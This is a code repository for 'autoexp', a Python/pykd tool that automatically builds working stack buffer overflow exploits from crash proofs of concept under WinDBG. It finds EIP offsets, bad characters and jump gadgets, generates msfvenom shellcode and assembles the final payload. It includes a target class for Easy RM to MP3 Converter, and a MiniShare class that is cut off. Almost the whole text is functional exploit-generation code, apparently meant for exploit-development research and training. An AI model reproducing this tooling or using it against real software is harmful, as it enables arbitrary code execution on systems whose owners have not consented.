├── LICENSE.md
├── README.md
├── White Paper - Exploit generation automation with WinDBG.docx
├── autoexp.py
├── class-easyrm.py
├── class-minishare.py
└── class-pcman.py


/LICENSE.md:
--------------------------------------------------------------------------------
1 | Copyright (c) <2016> <Csaba Fitzl>
2 | 
3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
4 | 
5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
6 | 
7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | autoexp
2 | =======
3 | A script to automatically create a working exploit from crash PoCs. See more details in the white paper.


--------------------------------------------------------------------------------
/White Paper - Exploit generation automation with WinDBG.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theevilbit/exploit_generator/ae3cc5c02c9d5e9ee091dbef04158d3bfd23330e/White Paper - Exploit generation automation with WinDBG.docx


--------------------------------------------------------------------------------
/autoexp.py:
--------------------------------------------------------------------------------
  1 | import pykd
  2 | from pykd import *
  3 | import argparse
  4 | import importlib
  5 | 
  6 | import socket, sys, struct, subprocess, os
  7 | from threading import Thread
  8 | from functools import wraps
  9 | from time import sleep
 10 | from string import uppercase, lowercase, digits
 11 | 
 12 | METASPLOITPATH = 'c:\\metasploit-framework\\bin\\msfvenom.bat'
 13 | 
 14 | MEM_ACCESS_EXE = {
 15 | 0x10  : "PAGE_EXECUTE"													 ,
 16 | 0x20  : "PAGE_EXECUTE_READ"												,
 17 | 0x40  : "PAGE_EXECUTE_READWRITE"										   ,
 18 | 0x80  : "PAGE_EXECUTE_WRITECOPY"										   ,
 19 | }
 20 | 
 21 | PAGE_SIZE = 0x1000
 22 | 
 23 | MAX_PATTERN_LENGTH = 67600
 24 | 
 25 | REGISTERS = ['eax','ebx','ecx','edx','esp','ebp','edi','esi']
 26 | 
 27 | ASM = {
 28 | "PUSH EAX" : "\x50",
 29 | "PUSH ECX" : "\x51",
 30 | "PUSH EDX" : "\x52",
 31 | "PUSH EBX" : "\x53",
 32 | "PUSH ESP" : "\x54",
 33 | "PUSH EBP" : "\x55",
 34 | "PUSH ESI" : "\x56",
 35 | "PUSH EDI" : "\x57",
 36 | 
 37 | "POP EAX" : "\x58",
 38 | "POP ECX" : "\x59",
 39 | "POP EDX" : "\x5A",
 40 | "POP EBX" : "\x5B",
 41 | "POP ESP" : "\x5C",
 42 | "POP EBP" : "\x5D",
 43 | "POP ESI" : "\x5E",
 44 | "POP EDI" : "\x5F",
 45 | 
 46 | "JMP EAX" : "\xFF\xE0",
 47 | "JMP ECX" : "\xFF\xE1",
 48 | "JMP EDX" : "\xFF\xE2",
 49 | "JMP EBX" : "\xFF\xE3",
 50 | "JMP ESP" : "\xFF\xE4",
 51 | "JMP EBP" : "\xFF\xE5",
 52 | "JMP ESI" : "\xFF\xE6",	
 53 | "JMP EDI" : "\xFF\xE7",
 54 | 
 55 | "CALL EAX" : "\xFF\xD0",
 56 | "CALL ECX" : "\xFF\xD1",
 57 | "CALL EDX" : "\xFF\xD2",
 58 | "CALL EBX" : "\xFF\xD3",
 59 | "CALL ESP" : "\xFF\xD4",
 60 | "CALL EBP" : "\xFF\xD5",
 61 | "CALL ESI" : "\xFF\xD6",
 62 | "CALL EDI" : "\xFF\xD7",
 63 | 
 64 | "JMP [EAX]" : "\xFF\x20",
 65 | "JMP [ECX]" : "\xFF\x21",
 66 | "JMP [EDX]" : "\xFF\x22",
 67 | "JMP [EBX]" : "\xFF\x23",
 68 | "JMP [ESP]" : "\xFF\x24",
 69 | "JMP [EBP]" : "\xFF\x25",
 70 | "JMP [ESI]" : "\xFF\x26",
 71 | "JMP [EDI]" : "\xFF\x27",
 72 | 
 73 | "CALL [EAX]" : "\xFF\x10",
 74 | "CALL [ECX]" : "\xFF\x11",
 75 | "CALL [EDX]" : "\xFF\x12",
 76 | "CALL [EBX]" : "\xFF\x13",
 77 | "CALL [ESP]" : "\xFF\x14",
 78 | "CALL [EBP]" : "\xFF\x15",
 79 | "CALL [ESI]" : "\xFF\x16",
 80 | "CALL [EDI]" : "\xFF\x17",
 81 | 
 82 | "XCHG EAX,ESP" : "\x94",
 83 | "XCHG ECX,ESP" : "\x87\xCC",
 84 | "XCHG EDX,ESP" : "\x87\xD4",
 85 | "XCHG EBX,ESP" : "\x87\xDC",
 86 | "XCHG EBP,ESP" : "\x87\xEC",
 87 | "XCHG EDI,ESP" : "\x87\xFC",
 88 | "XCHG ESI,ESP" : "\x87\xF4",
 89 | "XCHG ESP,EAX" : "\x94",
 90 | "XCHG ESP,ECX" : "\x87\xCC",
 91 | "XCHG ESP,EDX" : "\x87\xD4",
 92 | "XCHG ESP,EBX" : "\x87\xDC",
 93 | "XCHG ESP,EBP" : "\x87\xEC",
 94 | "XCHG ESP,EDI" : "\x87\xFC",
 95 | "XCHG ESP,ESI" : "\x87\xF4",	
 96 | 
 97 | "PUSHAD" : "\x60",
 98 | "POPAD" : "\x61",
 99 | "RET" : "\xC3"
100 | }
101 | 
102 | def log(msg):
103 | 	"""
104 | 	Log a message to console.
105 | 	@param msg: Message string
106 | 	@return: None
107 | 	"""
108 | 	print "[+] " + msg
109 | 
110 | class ExceptionHandler(pykd.eventHandler):
111 | 	"""
112 | 	class to handle exception and events in the debugger, overriding default class
113 | 	"""
114 | 	def __init__(self):
115 | 		pykd.eventHandler.__init__(self)
116 | 		self.accessViolationOccured = False
117 | 		self.bOver=0
118 | 
119 | 	def is_over(self):
120 | 		return self.bOver
121 | 
122 | 	def reset(self):
123 | 		self.accessViolationOccured = False
124 | 		self.bOver=0
125 | 
126 | 	def onException(self, exceptInfo):
127 | 		"""
128 | 		function to actually handle the exception, need to handle only if access violation occurs
129 | 		"""
130 | 		self.accessViolationOccured = exceptInfo.exceptionCode == 0xC0000005
131 | 		#print exceptInfo
132 | 
133 | 		if self.accessViolationOccured:
134 | 			#type = exceptInfo.parameters[0]
135 | 			#addr = exceptInfo.parameters[1]
136 | 			self.bOver=1 #break caused by accessViolation, no need to track further
137 | 			log('EIP: ' + hex(reg('eip')))
138 | 			return pykd.eventResult.Break
139 | 
140 | 		return pykd.eventResult.NoChange
141 | 
142 | 
143 | #Source: https://raw.githubusercontent.com/Svenito/exploit-pattern/master/pattern.py
144 | def pattern_gen(length):
145 | 	"""
146 | 	Generate a pattern of a given length up to a maximum
147 | 	of X - after this the pattern would repeat
148 | 	X = 20280 if special chars are not used
149 | 	X = 67600 if special charaters are used
150 | 	@param length: pattern length to generate
151 | 	"""
152 | 	if length >= MAX_PATTERN_LENGTH:
153 | 		log('ERROR: Pattern length exceeds maximum of %d' % MAX_PATTERN_LENGTH)
154 | 		sys.exit(-1)
155 | 
156 | 	pattern = ''
157 | 	#extended character set
158 | 	special = '!@#$%^&*()'
159 | 	for upper in uppercase:
160 | 		for lower in lowercase:
161 | 			for digit in digits:
162 | 				for item in special:
163 | 					if len(pattern) < length:
164 | 						pattern += upper+lower+digit+item
165 | 					else:
166 | 						out = pattern[:length]
167 | 						log(out)
168 | 						return out
169 | 
170 | #Source: https://raw.githubusercontent.com/Svenito/exploit-pattern/master/pattern.py
171 | def pattern_search(search_pattern):
172 | 	"""
173 | 	Search for search_pattern in pattern.  Convert from hex if needed
174 | 	Looking for needle in haystack
175 | 	@param search_pattern: pattern to serach for
176 | 	"""
177 | 	needle = search_pattern
178 | 
179 | 	try:
180 | 		if needle.startswith('0x'):
181 | 			# Strip off '0x', convert to ASCII and reverse
182 | 			needle = needle[2:].decode('hex')
183 | 			needle = needle[::-1]
184 | 	except TypeError as e:
185 | 		log('Unable to convert hex input:', e)
186 | 		sys.exit(-1)
187 | 
188 | 	haystack = ''
189 | 	special = '!@#$%^&*()'
190 | 	for upper in uppercase:
191 | 		for lower in lowercase:
192 | 			for digit in digits:
193 | 				for item in special:
194 | 					haystack += upper+lower+digit+item
195 | 					found_at = haystack.find(needle)
196 | 					if found_at > -1:
197 | 						log('Pattern %s first occurrence at position %d in pattern.' %
198 | 							  (search_pattern, found_at))
199 | 						return found_at
200 | 
201 | 	log('Couldn`t find %s (%s) anywhere in the pattern.' %
202 | 		   (search_pattern, needle))
203 | 
204 | #https://github.com/corelan/windbglib/blob/master/windbglib.py
205 | def get_seh_chain():
206 | 	sehchain = []
207 | 	# get top of chain
208 | 	teb = get_teb_address()
209 | 	nextrecord = ptrDWord(teb)
210 | 	validrecord = True
211 | 	while nextrecord != 0xffffffff and isValid(nextrecord):
212 | 		nseh = ptrDWord(nextrecord)
213 | 		seh = ptrDWord(nextrecord+4)
214 | 		sehrecord = [nextrecord,seh]
215 | 		sehchain.append(sehrecord)
216 | 		nextrecord = nseh
217 | 	return sehchain
218 | 
219 | #https://github.com/corelan/windbglib/blob/master/windbglib.py
220 | def get_teb_info():
221 | 	return typedVar("_TEB",getImplicitThread())
222 | 
223 | #https://github.com/corelan/windbglib/blob/master/windbglib.py
224 | def get_teb_address():
225 | 	tebinfo = dbgCommand("!teb")
226 | 	if len(tebinfo) > 0:
227 | 		teblines = tebinfo.split("\n")
228 | 		tebline = teblines[0]
229 | 		tebparts = tebline.split(" ")
230 | 		if len(tebparts) > 2:
231 | 			return hexStrToInt(tebparts[2])
232 | 	# slow
233 | 	teb = get_teb_info()
234 | 	return int(teb.Self)
235 | 
236 | def get_all_chars():
237 | 	"""
238 | 	Generate a list of all characters
239 | 	@return: list of characters 0x00 - 0xFF
240 | 	"""
241 | 	return [chr(i) for i in xrange(256)]
242 | 
243 | def check_bad_chars_inaddr(bad_chars,address):
244 | 	s = struct.pack('<l',address)
245 | 	for b in bad_chars:
246 | 		if b in s:
247 | 			return True
248 | 	return False
249 | 
250 | def string_to_hexescaped(s):
251 | 	"""
252 | 	Takes a string and will convert each char to a printed hex escaped string, and join them together
253 | 	@param s: input string
254 | 	@retrun printable hex escaped string
255 | 	"""
256 | 	return ''.join('\\x%02x' % ord(c) for c in s)
257 | 
258 | def search_memory(register,character,max,direction):
259 | 	"""
260 | 	Seraches for the start/end of buffer on the memory. Looks towards bottom/top as if it was on the stack
261 | 	@param charcter: charcter to look for at the end; max: max depth to check; direction: to look upwards or downwards(1 = down; -1 = up)
262 | 	@return offset
263 | 	"""
264 | 	if not direction in [-1,1]:
265 | 		log('Incorrect direction, exiting...')
266 | 		sys.exit(-1)
267 | 	search = True
268 | 	i = 0
269 | 	while search:
270 | 		if chr(ptrByte(reg(register) + i * direction)) == character:
271 | 			i = i + 1
272 | 		elif i == max:
273 | 			search = False
274 | 			log('End of buffer not found')
275 | 			return -1
276 | 		else:
277 | 			if direction == -1:
278 | 				log('Start of buffer: ' + hex(reg('esp') + i * direction + 1))
279 | 				log('Number of bytes between pointer and start of the buffer: ' + str(i - 1))
280 | 				search = False
281 | 				return i - 1
282 | 			elif direction == 1:
283 | 				log('End of buffer: ' + hex(reg('esp') + i * direction - 1))
284 | 				log('Number of bytes between pointer and end of the buffer: ' + str(i))
285 | 				search = False
286 | 				return i	
287 | 
288 | def get_byte_str_registry(registry,offset = 0):
289 | 	"""
290 | 	Get 1 byte converted to str pointed to by a registry
291 | 	@param registry: registry name; offset: offset from registry, by default 0
292 | 	@return character read from a location
293 | 	"""
294 | 	return chr(ptrByte(reg(registry) + offset))
295 | 
296 | def get_module_by_name(modname):
297 | 	"""
298 | 	Return a module object.
299 | 	@param modname: string module name
300 | 	@return: pykd module object
301 | 	"""
302 | 	return module(modname)
303 | 
304 | def get_loaded_modules():
305 | 	"""
306 | 	Return a list of module names.
307 | 	@return: module name list
308 | 	"""
309 | 	#return dbgCommand("lm1m").split('\n')
310 | 	modules = []
311 | 	proc = targetProcess.getCurrent()
312 | 	return [proc.getModule(i).name() for i in range(proc.getNumberModules())]
313 | 	#modules.append(proc.getModule(i).name())
314 | 	#return modules
315 | 
316 | def is_page_exec(address):
317 | 	"""
318 | 	Return True if a mem page is marked as executable
319 | 	@param address: address in hex format 0x41414141.
320 | 	@return: Bool
321 | 	"""
322 | 	try:
323 | 		protect = getVaProtect(address)
324 | 	except:
325 | 		protect = 0x1
326 | 	if protect in MEM_ACCESS_EXE.keys():
327 | 		return True
328 | 	else:
329 | 		return False
330 | 
331 | def find_exec_pages(mod):
332 | 	"""
333 | 	Find Executable Memory Pages for a module.
334 | 	@param mod: module object returned by getModule
335 | 	@return: a python list of executable memory pages
336 | 	"""
337 | 	pages = []
338 | 	pn = (mod.end() - mod.begin()) / PAGE_SIZE
339 | 	log("Total Memory Pages: %d" % pn)
340 | 	for i in xrange(0, pn):
341 | 		page = mod.begin() + i*PAGE_SIZE
342 | 		if is_page_exec(page):
343 | 			pages.append(page)
344 | 	log("Executable Memory Pages: %d" % len(pages))
345 | 	return pages
346 | 
347 | def aslr_enabled(mod):
348 | 	"""
349 | 	Check if a module is ALSR enabled
350 | 	@param mod: module object to inspect
351 | 	"""
352 | 	mzbase   = mod.begin()
353 | 	peoffset = loadDWords(mzbase+0x3c, 1)[0]
354 | 	pebase   = mzbase+peoffset
355 | 	flags	= loadWords(pebase+0x5e, 1)[0]
356 | 	if (flags&0x0040)==0:
357 | 		return False
358 | 	else:
359 | 		return True
360 | 
361 | def find_asm(pages,asmlist):
362 | 	"""
363 | 	Find all given assembly instructions for the given memory pages.
364 | 	@param pages: list of memory pages; asm: assembly command to search for
365 | 	@return: list of memory addresses
366 | 	"""
367 | 	asm_address = []
368 | 	#log(str(asmlist))
369 | 	try:
370 | 		asm = ''.join([ASM[a] for a in asmlist])
371 | 		l = len(asm) #byte length of the assembly instruction from the predefined list
372 | 	except Exception, e:
373 | 		log(str(e))
374 | 		log('Not supported assembly instructions')
375 | 		return asm_address
376 | 	for page in pages:
377 | 		ptr = page
378 | 		while (ptr < (page + PAGE_SIZE - l + 1)) and (ptr != 0): #need to subtract 'l' in order to not slip out the page
379 | 			ptr = searchMemory(ptr, PAGE_SIZE-(ptr-page), asm)
380 | 			if ptr != 0:
381 | 				asm_address.append(ptr)
382 | 				ptr += 1
383 | 			else:
384 | 				break
385 | 	log("Found %d asm instructions" % len(asm_address))
386 | 	return asm_address
387 | 
388 | def initialize_debugger(start_command):
389 | 	"""
390 | 	Start process in debugger and load symbols
391 | 	@param start_command: process to start in debugger
392 | 	"""
393 | 	startProcess(start_command)
394 | 	dbgCommand('.symfix')
395 | 	dbgCommand('.reload')
396 | 
397 | def start_and_exploit(exploit):
398 | 	"""
399 | 	Function to start the application and run the exploit.
400 | 	@param exploit: instance of the exploit class 
401 | 	"""
402 | 	if exploit.is_filebased():
403 | 		exploit.exploit()
404 | 		initialize_debugger(exploit.get_command())
405 | 		expHandler = ExceptionHandler()
406 | 		try:
407 | 			while not expHandler.is_over():
408 | 				go()
409 | 		except Exception, err:
410 | 			log(str(err))
411 | 	else:
412 | 		initialize_debugger(exploit.get_command())
413 | 		expHandler = ExceptionHandler()
414 | 		exploit.exploit()
415 | 		try:
416 | 			while not expHandler.is_over():
417 | 				go()
418 | 		except Exception, err:
419 | 			log(str(err))
420 | 
421 | 
422 | def get_eip_offset(exploit,details):
423 | 	"""
424 | 	Get the EIP offset
425 | 	@params exploit: the object for the exploit;details: dictionary to be populated with the gathered info; command: process to start
426 | 	@return updated dictionary with the details
427 | 	"""
428 | 	buf_size = exploit.get_buffer_length()
429 | 	exploit.set_buffer([pattern_gen(buf_size)])
430 | 	start_and_exploit(exploit)
431 | 	details['eip_offset'] = pattern_search(hex(reg('eip')))
432 | 	killAllProcesses()
433 | 	log('EIP offset is: ' + str(details['eip_offset']))
434 | 
435 | 	#Verify if EIP address was determined properly
436 | 	exploit.set_buffer(['A' * details['eip_offset'],'BBBB','C' * (buf_size - 4 - details['eip_offset'])])
437 | 	start_and_exploit(exploit)
438 | 	if hex(reg('eip')) == '0x42424242':
439 | 		log('EIP offset is determined properly')
440 | 		killAllProcesses()
441 | 	else:
442 | 		log('Couldn\'t determine EIP offset reliably, exiting...')
443 | 		killAllProcesses()
444 | 		sys.exit(-1)
445 | 
446 | def get_usable_registers(exploit,details):	
447 | 	"""
448 | 	Get the usable registers (which point to our buffer) and their related offset and buffer space available
449 | 	@params exploit: the object for the exploit;details: dictionary to be populated with the gathered info; command: process to start
450 | 	@return updated dictionary with the details
451 | 	"""
452 | 	buf_size = exploit.get_buffer_length()
453 | 	exploit.set_buffer(['A' * details['eip_offset'],'BBBB','C' * (buf_size - 4 - details['eip_offset'])])
454 | 	start_and_exploit(exploit)
455 | 	details['points_to_first_buffer'] = []
456 | 	details['points_to_second_buffer'] = []
457 | 	for r in REGISTERS:
458 | 		try:
459 | 			log('Register ' + r + ' ' + hex(ptrPtr(reg(r))))
460 | 			if hex(int(ptrPtr(reg(r)))) == '0x41414141':
461 | 				details['points_to_first_buffer'].append(r)
462 | 				details[r + '_offset'] = search_memory(r,chr(0x41),buf_size,-1)
463 | 				details[r + '_bufferspace'] = search_memory(r,chr(0x41),buf_size,1)
464 | 				log(r + ' points to AAAA buffer, offset: ' + str(details[r + '_offset']) + ', space available: ' + str(details[r + '_bufferspace']))			
465 | 			elif hex(int(ptrPtr(reg(r)))) == '0x43434343':
466 | 				details['points_to_second_buffer'].append(r)
467 | 				details[r + '_offset'] = search_memory(r,chr(0x43),buf_size,-1)
468 | 				details[r + '_bufferspace'] = search_memory(r,chr(0x43),buf_size,1)			
469 | 				log(r + ' points to CCCC buffer, offset: ' + str(details[r + '_offset']) + ', space available: ' + str(details[r + '_bufferspace']))			
470 | 		except MemoryException, err:
471 | 			log('MemoryException for register: ' + r)
472 | 	killAllProcesses()
473 | 	
474 | def get_bad_chars(exploit,details):
475 | 	"""
476 | 	Determine bad characters
477 | 	@params exploit: the object for the exploit;details: dictionary to be populated with the gathered info; command: process to start
478 | 	@return updated dictionary with the details
479 | 	"""
480 | 	bad_chars = []
481 | 	good_chars = get_all_chars()
482 | 	trials = 0 #track how many characters were checked
483 | 	#Find buffer sufficient for 256 characters:
484 | 	r = ''
485 | 	for reg in details['points_to_second_buffer']:
486 | 		if details[reg + '_bufferspace'] < 256:
487 | 			log('There is not enough space to find bad chars with register: ' + reg)
488 | 			pass
489 | 		else:
490 | 			r = reg
491 | 			break
492 | 	
493 | 	if r == '':
494 | 		for reg in details['points_to_first_buffer']:
495 | 			if details[reg + '_bufferspace'] < 256:
496 | 				log('There is not enough space to find bad chars with register: ' + reg)
497 | 				pass
498 | 			else:
499 | 				r = reg
500 | 				break
501 | 	if r == '':
502 | 		log('There is not enough space to find bad chars, exiting...')
503 | 		sys.exit(-1)					
504 | 	
505 | 	while trials < 255:
506 | 		log('Testing for bad chars...')
507 | 		if r in details['points_to_second_buffer']:
508 | 			exploit.set_buffer(['A' * details['eip_offset'],'BBBB','C' * details[r + '_offset'],''.join(good_chars),'C' * (details[r + '_bufferspace'] - len(good_chars) - details[r + '_offset'])])
509 | 		else:
510 | 			#TO BE WRITTEN
511 | 			log('Finding bad chars with pointers to frist buffer not yet supported, exiting...')
512 | 			sys.exit(-1)			
513 | 			#exploit.set_buffer(['A' * details['eip_offset'],'BBBB','C' * details[r + '_offset'],''.join(good_chars),'C' * (details[r + '_bufferspace'] - len(good_chars) - details[r + '_offset'])])
514 | 		start_and_exploit(exploit)
515 | 		bad_found = False
516 | 		index = 0
517 | 		while not bad_found and (index<len(good_chars)-1):
518 | 			"""
519 | 			logic: if the character and the following one matches with the ones in the good_chars list (based on the index), go to the next one
520 | 			if not, then record it as bad (the first from the two, as it might mess the second) and start over
521 | 			"""
522 | 			if (get_byte_str_registry(r,index) == good_chars[index] and get_byte_str_registry(r,index+1) == good_chars[index+1]):
523 | 				index = index + 1
524 | 				trials = trials + 1		
525 | 			else:
526 | 				bad_chars.append(good_chars[index])
527 | 				log('Bad char found: ' + good_chars[index] + ':' + string_to_hexescaped(good_chars[index]))
528 | 				good_chars.pop(index)
529 | 				trials = trials + 1
530 | 				bad_found = True
531 | 		killAllProcesses()			
532 | 	details['bad_chars'] = bad_chars
533 | 	details['good_chars'] = good_chars
534 | 	log("Bad characters: " + ','.join(bad_chars) + ':' + string_to_hexescaped(bad_chars))
535 | 
536 | def get_asm_location_list(details,asmlist,exploit,check_aslr = False):
537 | 	"""
538 | 	Determine memory location for given assembly instruction in all loaded modules, can ask to check only non-ASLR modules
539 | 	@params exploit: the object for the exploit;details: dictionary to be populated with the gathered info; command: process to start
540 | 	@return updated dictionary with the details
541 | 	"""
542 | 	initialize_debugger(exploit.get_command())
543 | 	modulenames = get_loaded_modules()
544 | 	asm_address = []
545 | 	for m in modulenames:
546 | 		if check_aslr and aslr_enabled(get_module_by_name(m)):
547 | 			pass
548 | 		else:
549 | 			log('Checking module: ' + m)
550 | 			mpages = find_exec_pages(get_module_by_name(m))
551 | 			for a in find_asm(mpages,asmlist):
552 | 				asm_address.append(a)
553 | 	print [hex(a) for a in asm_address]
554 | 	details['asm_address'] = asm_address
555 | 	killAllProcesses()
556 | 
557 | def generate_shellcode(details):
558 | 	"""
559 | 	Generate shellcode with calling metasploit, considering bad characters
560 | 	@params details: dictionary with the gathered details
561 | 	@return shellcode
562 | 	"""
563 | 	log('Generating shellcode...')
564 | 	subprocess.call([METASPLOITPATH, "-p", "windows/exec", "CMD=calc.exe", "-b", '\'' + string_to_hexescaped(details['bad_chars']) + '\'', '-f', 'raw', '-o', 'out.raw'])
565 | 	f = open('out.raw','rb')
566 | 	shellcode = f.read()
567 | 	f.close()
568 | 	os.remove('out.raw')
569 | 	return shellcode
570 | 
571 | def build_bof(exploit,details):
572 | 	"""
573 | 	Build final BOF exploit with all gathered details - currently assumes pointer at second part of the buffer
574 | 	@params exploit: the object for the exploit;details: dictionary containing the gathered info
575 | 	@returns True/False depending if the BOF could be built or not
576 | 	"""
577 | 	#check if bad char is in a memory address
578 | 	shellcode = "\x90" * 16 + generate_shellcode(details)
579 | 	log('Shellcode: ' + string_to_hexescaped(shellcode))
580 | 	for register in REGISTERS:
581 | 		try:
582 | 			if len(shellcode) > details[register + '_bufferspace']:
583 | 				log('No place for shellcode using register: ' + register + ', trying next')
584 | 			else:
585 | 				if details['jmp_to_sc_method'] == 'jmp_reg' or details['jmp_to_sc_method'] == 'call_reg':
586 | 					exploit.set_buffer(['A' * details['eip_offset'], struct.pack('<l',details['jmp_to_sc_address']), details[register + '_offset'] * '\x90',shellcode, '\x90' * (details[register + '_bufferspace']-len(shellcode))])
587 | 					return True
588 | 		except Exception, e:
589 | 			log(str(e))
590 | 	return False #if couldn't build bof
591 | 
592 | def find_jmp_to_shellcode(details, exploit ,check_aslr = False):
593 | 	"""
594 | 	This function tries to find memory addresses to jump to the shellcode via various methods
595 | 	@params details: dictionary containing the gathered info; exploit: the object for the exploit; check_aslr: only search non ASLR enabled modules
596 | 	@returns True if found, otherwise the script will exit
597 | 	"""
598 | 	for register in details['points_to_second_buffer'] + details['points_to_first_buffer']:
599 | 		register = register.upper()
600 | 		#First try to find ASM instructoin to directly jump to a register
601 | 		get_asm_location_list(details,['JMP ' + register], exploit, check_aslr)
602 | 		if len(details['asm_address']) != 0:
603 | 			for address in details['asm_address']:
604 | 				if not check_bad_chars_inaddr(details['bad_chars'],address):
605 | 					log('JMP ' + register.upper() + ' at ' + hex(address) + ' will be used')
606 | 					details['jmp_to_sc_method'] = 'jmp_reg'
607 | 					details['jmp_to_sc_address'] = address
608 | 					return True
609 | 		log('Couldn\'t find memory location with the given assembly (JMP [reg]), checking CALL [reg]')
610 | 
611 | 		#Next option is to try CALL [reg]
612 | 		get_asm_location_list(details,['CALL ' + register], exploit, check_aslr)
613 | 		if len(details['asm_address']) != 0:
614 | 			for address in details['asm_address']:
615 | 				if not check_bad_chars_inaddr(details['bad_chars'],address):
616 | 					log('CALL ' + register.upper() + ' at ' + hex(address) + ' will be used')
617 | 					details['jmp_to_sc_method'] = 'call_reg'
618 | 					details['jmp_to_sc_address'] = address
619 | 					return True
620 | 		log('Couldn\'t find memory location with the given assembly (CALL [reg]), checking PUSH [reg];RET')
621 | 
622 | 		#Next option is to try PUSH [reg];RET
623 | 		get_asm_location_list(details,['PUSH ' + register,'RET'], exploit, check_aslr)
624 | 		if len(details['asm_address']) != 0:
625 | 			for address in details['asm_address']:
626 | 				if not check_bad_chars_inaddr(details['bad_chars'],address):
627 | 					log('PUSH ' + register.upper() + ';RET at ' + hex(address) + ' will be used')
628 | 					details['jmp_to_sc_method'] = 'push_reg_ret'
629 | 					details['jmp_to_sc_address'] = address
630 | 					return True
631 | 		log('Couldn\'t find any memory location to jmp to the shellcode with regsiter: ' + register)
632 | 	log('Couldn\'t find any memory location  tojmp to the shellcode, exiting...')
633 | 	sys.exit(-1)
634 | 
635 | if __name__ == "__main__":
636 | 	#Parse arguments
637 | 	parser = argparse.ArgumentParser(description='Automated exploit generation')
638 | 	# Add arguments
639 | 	parser.add_argument('-e', '--exploit', type=str, help='exploit class file', required=True)
640 | 	parser.add_argument('-a', '--aslr', action='store_true', help='Try to use modules w/o ASLR enabled', required=False, default=False)
641 | 	parser.add_argument('-t', '--type', type=str, help='Exploit type (bof,...)', required=False, default='bof')
642 | 	args = parser.parse_args()
643 | 
644 | 	#Dynamicaly load Exploit class from the supplied file
645 | 	try:
646 | 		m = importlib.import_module(args.exploit[0:-3])
647 | 		Exploit = getattr(m, 'Exploit')
648 | 	except Exception,e:
649 | 		print str(e)
650 | 		log('Error occured, exiting...')
651 | 		sys.exit(-1)
652 | 		
653 | 	exploit = Exploit()
654 | 	
655 | 	details = {}			
656 | 	get_eip_offset(exploit,details)
657 | 	get_usable_registers(exploit,details)
658 | 	if len(details['points_to_second_buffer'] + details['points_to_first_buffer']) == 0:
659 | 		log('No proper register found to continue, exiting...')
660 | 		sys.exit(-1)
661 | 	get_bad_chars(exploit,details)	
662 | 	find_jmp_to_shellcode(details,exploit,args.aslr)
663 | 	if build_bof(exploit,details):
664 | 		exploit.save()
665 | 		start_and_exploit(exploit)
666 | 	else:
667 | 		log('Couldn\'t build BOF')
668 | 	
669 | 
670 | 	
671 | 	
672 | 


--------------------------------------------------------------------------------
/class-easyrm.py:
--------------------------------------------------------------------------------
 1 | import socket, sys, struct, subprocess, os
 2 | from threading import Thread
 3 | from functools import wraps
 4 | from time import sleep
 5 | 
 6 | def run_async(func):
 7 | 	"""
 8 | 	function decorator, intended to make "func" run in a separate thread (asynchronously).
 9 | 	@return: the created Thread object
10 | 
11 | 	E.g.:
12 | 	@run_async
13 | 	def task1():
14 | 		do_something
15 | 
16 | 	@run_async
17 | 	def task2():
18 | 		do_something_too
19 | 
20 | 	t1 = task1()
21 | 	t2 = task2()
22 | 	...
23 | 	t1.join()
24 | 	t2.join()
25 | 	"""
26 | 	@wraps(func)
27 | 	def async_func(*args, **kwargs):
28 | 		func_hl = Thread(target = func, args = args, kwargs = kwargs)
29 | 		func_hl.start()
30 | 		return func_hl
31 | 
32 | 	return async_func
33 | 
34 | class Exploit():
35 | 	"""
36 | 	class that contains the exploit, and that can be used to build it
37 | 	"""
38 | 	def __init__(self):
39 | 		self.egg = 'EGGG'
40 | 		self.shellcode = ''
41 | 		self.jmpesp = ''
42 | 		self.prebuff = ''
43 | 		self.postbuff = ''
44 | 		self.buffer = [self.egg*2, "A"*30090]
45 | 		self.file_based = True
46 | 		self.filename = 'c:\\autoexploit\\list.m3u'
47 | 		self.command = 'C:\\Program Files (x86)\\Easy RM to MP3 Converter\\RM2MP3Converter.exe /cf'
48 | 
49 | 	@run_async
50 | 	def exploit(self):
51 | 		"""
52 | 		This function runs the actual exploit
53 | 		"""
54 | 		f = open(self.filename,'w')
55 | 		f.write(''.join(self.buffer))
56 | 		f.close()
57 | 		
58 | 	def get_buffer(self):
59 | 		return self.buffer
60 | 	
61 | 	def set_buffer(self,buff):
62 | 		self.buffer = buff
63 | 		
64 | 	def get_buffer_length(self):
65 | 		return len(''.join(self.buffer))
66 | 	
67 | 	def get_egg(self):
68 | 		return self.egg
69 | 	
70 | 	def set_egg(self,egg):
71 | 		self.egg = egg
72 | 
73 | 	def get_filename(self):
74 | 		return self.filename
75 | 	
76 | 	def set_filename(self,filename):
77 | 		self.filename = filename
78 | 	
79 | 	def is_filebased(self):
80 | 		return self.file_based
81 | 
82 | 	def get_command(self):
83 | 		return self.command + ' ' + self.filename
84 | 	
85 | 	def save(self):
86 | 		pass


--------------------------------------------------------------------------------
/class-minishare.py:
--------------------------------------------------------------------------------
 1 | import socket, sys, struct, subprocess, os
 2 | from threading import Thread
 3 | from functools import wraps
 4 | from time import sleep
 5 | 
 6 | def run_async(func):
 7 | 	"""
 8 | 	function decorator, intended to make "func" run in a separate thread (asynchronously).
 9 | 	@return: the created Thread object
10 | 
11 | 	E.g.:
12 | 	@run_async
13 | 	def task1():
14 | 		do_something
15 | 
16 | 	@run_async
17 | 	def task2():
18 | 		do_something_too
19 | 
20 | 	t1 = task1()
21 | 	t2 = task2()
22 | 	...
23 | 	t1.join()
24 | 	t2.join()
25 | 	"""
26 | 	@wraps(func)
27 | 	def async_func(*args, **kwargs):
